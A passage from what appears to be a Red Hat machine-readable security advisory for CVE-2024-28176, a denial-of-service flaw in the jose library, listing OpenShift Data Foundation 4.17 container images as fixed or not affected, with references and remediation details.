"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268820", }, ], notes: [ { category: "description", text: "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user's environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "jose: resource exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-28176", }, { category: "external", summary: "RHBZ#2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-28176", url: "https://www.cve.org/CVERecord?id=CVE-2024-28176", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", }, { category: "external", summary: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", url: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", }, ], release_date: "2024-03-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", 